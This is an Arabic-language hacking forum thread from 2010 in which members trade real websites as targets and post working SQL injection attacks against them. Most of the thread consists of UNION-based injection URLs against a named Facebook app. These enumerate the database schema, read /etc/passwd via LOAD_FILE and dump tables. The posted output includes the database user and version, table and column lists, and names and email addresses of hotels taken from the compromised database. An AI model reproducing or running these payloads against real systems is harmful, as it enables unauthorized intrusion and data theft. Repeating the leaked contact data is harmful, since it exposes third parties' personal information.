غرفة حقن قواعد البيانات {غرفة Sql }

darkman.dz · 08-10-2010, 12:23 AM

هل سبق وواجه أحد منكم موقع به 276 فاعدة بيانات متصلة ببعضها
و فيه 11 عمود باسوورد مختلف !!!!!!!!!!!!!!!
أعتقد أن الحظ إبتسم لي + الموقع موقع شوبينق shopping
هههههههههههههههههههههههههههههههههههههههههههههههههه ههههه
لكن راح أحطو لكم بعد الإنتهاء من فحصه كاملا

المصدر: :: vBspiders Professional Network ::

Master vbspiders · 08-10-2010, 01:30 PM

اقتباس

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo


	هل سبق وواجه أحد منكم موقع به 276 فاعدة بيانات متصلة ببعضها و فيه 11 عمود باسوورد مختلف !!!!!!!!!!!!!!! أعتقد أن الحظ إبتسم لي + الموقع موقع شوبينق shopping هههههههههههههههههههههههههههههههههههههههههههههههههه ههههه لكن راح أحطو لكم بعد الإنتهاء من فحصه كاملا

[align=center]ممممم انت متاكد انو موقع عادي مش هوست ؟
بعد ما تفحصو ونحن نكمل حقن الاهداف الجديدة انت قم بوضعو...
شكلو هدف نااار
تحياتي[/align]

darkman.dz · 08-10-2010, 04:31 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Master vbspiders


	[align=center]ممممم انت متاكد انو موقع عادي مش هوست ؟ بعد ما تفحصو ونحن نكمل حقن الاهداف الجديدة انت قم بوضعو... شكلو هدف نااار تحياتي[/align]

ما هو الفرق بين الموقع والهوست أنا أعتقد حسب علمي أن الهوست هو المضيف يعني ممكن أجد root هل هذا ماقصدت ؟؟
أنا حسب علمي المواقع التجارية معظمها مركب على سيرفرات خاصة وتقريبا تكون وحيدة على السيرفر لتجنب الإنتقال عبر المواقع المصابة و الوصول إليها

Master vbspiders · 08-10-2010, 05:05 PM

اقتباس

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo


	ما هو الفرق بين الموقع والهوست أنا أعتقد حسب علمي أن الهوست هو المضيف يعني ممكن أجد root هل هذا ماقصدت ؟؟ أنا حسب علمي المواقع التجارية معظمها مركب على سيرفرات خاصة وتقريبا تكون وحيدة على السيرفر لتجنب الإنتقال عبر المواقع المصابة و الوصول إليها

[align=center]ممم بالنسبة للهوست
كلامك سليم لكن...
احيانا الاستضافة تعمل باك اب لقواعد البيانات الخاصة بالمواقع الي موجودة على السيرفر الخاص فيها
ولذلك ممكن تلقي قواعد بيانات متعددة وهيك
اما بالنسبة للمواقع التجارية فلا اعلم عنها شي
عموما انت قم بطرح الموقع وان شاء الله بنقدر نحقنو
تحياتي لك[/align]

darkman.dz · 08-10-2010, 05:21 PM

ok
لكن قبل كل شيئ هذا موقع
أنا تأكدتمن أنه مصاب وكذلك وجدت أن عدد الأعمدة 9
لكن لم أجد الأعمدة المصابة
أعتقد أنها في ال source الخاص بالصفحة
و أنا لا أحب أبدا البحث فيه
لذلك سأهديه لكم
وها هو

كود:

http://www.pixheaven.net

d4rK-h4ck3r · 08-10-2010, 12:26 AM

اول موقع احطه فيه بعض الصعوبة
http://energychoices.com/page_news_fullpage.php?id=1048

d4rK-h4ck3r · 08-10-2010, 03:02 AM

من يقدر على هدا
http://apps.facebook.com/myhotdeals/...hp?promoid=150'
تصدق ان الجداول تتغير كل ثانية لول

king dragons · 08-10-2010, 06:04 AM

[align=center]
السلام عليكم

هلا بيكم

ثغرة الــ facebook

صورة للحقنة

الاستغلال

لازم اتحطو اخر الحقنة --

http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,version%28%29,user%28%29,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32----

http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,group_concat%28table_name,0x3a,column_name, 0x3a,table_schema%29,7,8,9,10,11,12,13,group_conca t%28table_name,0x3a,column_name,0x3a,table_schema% 29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32+from+information_schema.columns+where+colum n_name+LIKE+char%2837,%20112,%2097,%20115,%20115,% 2037%29----

http://apps.facebook.com/myhotdeals/...20101,%2037)--)--
[/align]

الي يعرف ايكمل مايبخل علينا

kanvi · 08-10-2010, 01:19 PM

اقتباس

المشاركة الأصلية كتبت بواسطة king dragons


	[align=center] السلام عليكم هلا بيكم ثغرة الــ facebook صورة للحقنة الاستغلال لازم اتحطو اخر الحقنة -- http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,version%28%29,user%28%29,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32---- http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,group_concat%28table_name,0x3a,column_name, 0x3a,table_schema%29,7,8,9,10,11,12,13,group_conca t%28table_name,0x3a,column_name,0x3a,table_schema% 29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32+from+information_schema.columns+where+colum n_name+LIKE+char%2837,%20112,%2097,%20115,%20115,% 2037%29---- http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,group_concat(table_name,0x3a,column_name,0x 3a,table_schema),7,8,9,10,11,12,13,group_concat(ta ble_name,0x3a,column_name,0x3a,table_schema),15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+f rom+information_schema.columns+where+column_name+L IKE+CHAR(37,%20117,%20115,%20101,%20114,%20110,%20 97,%20109,%20101,%2037)--)-- [/align] الي يعرف ايكمل مايبخل علينا

شكرا لك اخي وهذا متوصلت اليه :
معلمومات على الموقع:

كود PHP:

  http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

root@localhost : facebook : 5.1.37-1ubuntu5.4

LIST TABLES

كود PHP:

  http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat(table_schema,0x3a,table_name),7,8,9,10,11,12,13,group_concat(table_schema,0x3a,table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--

كود PHP:

  facebook:accommodation,
        facebook:addcode,
        facebook:adventplace,
        facebook:answers,
        facebook:bookings,
        facebook:bulletin,
        facebook:cat_child,
        facebook:categories,
        facebook:collage,
        facebook:collagealbums,
        facebook:country,
        facebook:edm,
        facebook:eventboard,
        facebook:eventbuddies,
        facebook:eventcomments,
        facebook:eventcomments1,facebook:eventmonth,
        facebook:fbstream,
        facebook:forums,
        facebook:forums1,
        facebook:friends,
        facebook:friends2,
        facebook:funquiz,
        facebook:gb_checkins,
        facebook:guestbook,
        facebook:hotstickers,
        facebook:hotstickers1,
        facebook:isocode,
        facebook:location,
        facebook:loungebuddies,
        facebook:market_*****s,
        facebook:marketplace,
        facebook:mylounge,
        facebook:mymap,
        facebook:mystickers,
        facebook:mytasks,
        facebook:parentevent,
        facebook:photocache,
        facebook:place,
        facebook:place1,
        facebook:placeboard,
        facebook:placeboardusers,
        facebook:poll_cache,
        facebook:poll_groups,
        facebook:poll_options,
        facebook:poll_options1,
        facebook:poll_profile,
        facebook:poll_users,
        facebook:polls,
        facebook:polls1,
        facebook:popularplace,
        facebook:post_photos,
        facebook:postca

LIST COLUMNS

كود PHP:

  http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat(table_schema,0x3a,table_name,0x3a,column_name),7,8,9,10,11,12,13,group_concat(table_schema,0x3a,table_name,0x3a,column_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--

كود PHP:

  facebook:accommodation:id,
        facebook:accommodation:name,
        facebook:accommodation:url,
        facebook:accommodation:locationId,
        facebook:accommodation:a_lat,
        facebook:accommodation:a_long,
        facebook:accommodation:type,
        facebook:accommodation:value,
        facebook:accommodation:valueCount,
        facebook:accommodation:description,
        facebook:accommodation:currency,
        facebook:accommodation:price_min,
        facebook:accommodation:price_max,
        facebook:accommodation:standard_price_min,
        facebook:accommodation:standard_price_max,
        facebook:accommodation:address,
        facebook:accommodation:email,
        facebook:accommodation:img_url,
        facebook:accommodation:def_img,
        facebook:accommodation:saved,
        facebook:addcode:tbid,
        facebook:addcode:userid,
        facebook:addcode:code,
        facebook:addcode:app,
        facebook:addcode:install,
        facebook:addcode:timestamp,
        facebook:addcode:lastlogin,f
        acebook:adventplace:placeid,
        facebook:adventplace:adventplaceid,
        facebook:adventplace:total,
        facebook:answers:seq,f
        acebook:answers:uid,
        facebook:answers:qid,
        facebook:answers:ans,
        facebook:answers:seconds,
        facebook:answers:points

هذه الحقنة النهائية :

كود PHP:

  http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(id,0x3a,name,0x3a,email),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+accommodation--

كود PHP:

  1:Cheriton House:info@cheritonhouse.co.uk,
        20997:Highways House:reservations@highwayshouse.co.uk,
        5:B&B San Benedetto:info@bb-sanbenedetto.it,
        13:HOTEL DELL'ARTE:HotelArte@hotmail.it,
        35:Hotel Meridiana:albergo.meridiana@tiscali.it,
        39:Agriturismo Ardene:info@agriturismoardene.it,
        41:Alexander Bed&Breakfast:info@alexanderbb.it,
        48:Casavacanza Vaticano:info@casavacanzavaticano.it,
        50:Alla Settima Luna:,
        60:Maison Genevois 3:info@maisongenevois3.com,
        61:Caterina a San Pietro B&B:,
        77:Gladiator Rooms:,
        80:B&B Svevo e Joyce:svevo.joyce@libero.it,
        82:The Paggino farm holidays:paggino@tuscanyexperience.net,
        95:Suite Manzoni:info@suitemanzoni.it,
        102:La Canonica di Fungaia:claudianatalucci@tiscali.it,
        105:Hotel Milazzo Roma:info@hotelmilazzo.com,
        118:Agriturismo Allevamento Renaccino:allevamentorenaccino@yahoo.it,
        120:B&B Campo de' Fiori:info@bbcampodefiori.com,125:Agriturismo Marciano:staff@agriturismomarciano.it,
        136:BUENAVISTA:info@buenavista-bandb.it,
        146:Borgo di Torri:,152:IDEAL:info@idealbandb.com,
        156:Ricordi di Roma:info@ricord

وهذا
magic_ qiotes

كود PHP:

  http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

mouadh kouki · 08-10-2010, 10:59 AM

mercciiiiiiiiiiiiiiii

Master vbspiders · 08-10-2010, 01:42 PM

[align=center]
d4rK-h4ck3r
شكرا على الاهداف اخي الكريم...
king dragons
نورت الغرفة شغل حلو واصل
kanvi
بارك الله فيك اخي الغالي على الحقنة الكاملة تم التقييم
تحياتي

[/align]

kanvi · 08-10-2010, 01:58 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Master vbspiders


	[align=center] d4rK-h4ck3r شكرا على الاهداف اخي الكريم... king dragons نورت الغرفة شغل حلو واصل kanvi بارك الله فيك اخي الغالي على الحقنة الكاملة تم التقييم تحياتي [/align]

شكرا لترحيبكم بي انت وجميع الاخوة في هذا الموضوع

TIKTAKram · 08-10-2010, 03:25 PM

Back

عودة من جديد

هل من أهداف ؟ أو أضع لكم ؟

darkman.dz · 08-10-2010, 04:27 PM

السلام عليكم
هل من مواقع لتسخين اليدين
هههههههههههههههههههههه

الشبح المرح · 08-10-2010, 06:30 PM

اخوي دارك مان

راح اشوف المشكلة ذي

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
العدد (3) من غرفة الحقن	darkman.dz	SQL قواعد البيانات	397	12-30-2010 01:23 PM
جهاز من غرفة جـنـسـيـة	MasTer MiND	Hackers Showoff	6	06-25-2009 04:01 PM

غرفة حقن قواعد البيانات {غرفة Sql }

SQL قواعد البيانات